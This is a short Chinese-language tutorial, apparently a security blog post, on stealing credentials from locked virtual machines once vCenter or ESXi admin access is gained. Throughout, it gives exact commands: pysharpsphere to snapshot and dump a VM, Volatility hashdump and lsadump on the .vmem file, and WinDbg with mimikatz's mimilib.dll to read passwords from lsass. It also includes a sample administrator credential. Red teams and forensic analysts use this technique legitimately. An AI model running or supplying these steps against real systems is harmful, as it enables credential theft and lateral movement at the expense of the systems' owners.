VCenter獲得鎖屏機器Hash之內存快照抓取Hash
VSole2022-07-11 07:58:22
VCenter獲得鎖屏機器Hash之內存快照抓取Hash
內存快照抓hash
在很多情況下,當我們拿到VCenter或ESXI 服務器權限和Web后臺權限登錄后,發現很多重要的系統鎖屏了,想要進入還需要輸入密 碼。因此,這時我們就需要抓取處于鎖屏狀態機器的Hash了。以下介紹使用內存快照抓取Hash。
使用pysharpsphere或SharpSphere對指定目標機器拍攝快照,然后dump鏡像到本地。
#dump MoID為vm-59的機器鏡像到本地
pysharpsphere -H 192.168.106.14 -u administrator@vsphere.local -p "P@ssword1234" dump -t vm-59
Volatility讀取內存
目標機器快照鏡像dump到本地后,可以使用Volatility直接對.vmem文件進行內存密碼抓取。
如下命令獲取鏡像信息:
./volatility_2.6_mac64_standalone -f Win7-Snapshot2.vmem imageinfo
如下命令抓取哈希或明文密碼:
#抓取哈希
./volatility_2.6_mac64_standalone -f Win7-Snapshot2.vmem --profile=Win7SP1x64 hashdump
#抓取明文密碼
./volatility_2.6_mac64_standalone -f Win7-Snapshot2.vmem --profile=Win7SP1x64 lsadump
windbg讀取內存
也可以使用windbg進行讀取。首先使用 Bin2Dmp執行如下命令將該內存文件轉成dmp文件,如下轉成win7.dmp文件。
Bin2Dmp.exe Win7-Snapshot2.vmem win7.dmp
然后使用windbg載入win7.dmp文件,如下。
接著在kd> 中輸入下面的命令
#設置符號路徑
.symfix
#重新載入
.reload
#加載mimilib.dll路徑
.load D:\mimikatz\x64\mimilib.dll
#查找lsass進程,并將該進程轉到本機環境中
!process 0 0 lsass.exe
#這里的fffffa80035c4b30是上一步查找lsass進程的地址,注意替換
.process /r /p fffffa80035c4b30
#載入mimikatz,讀取密碼
!mimikatz
最后讀取出密碼如下。
VSole
網絡安全專家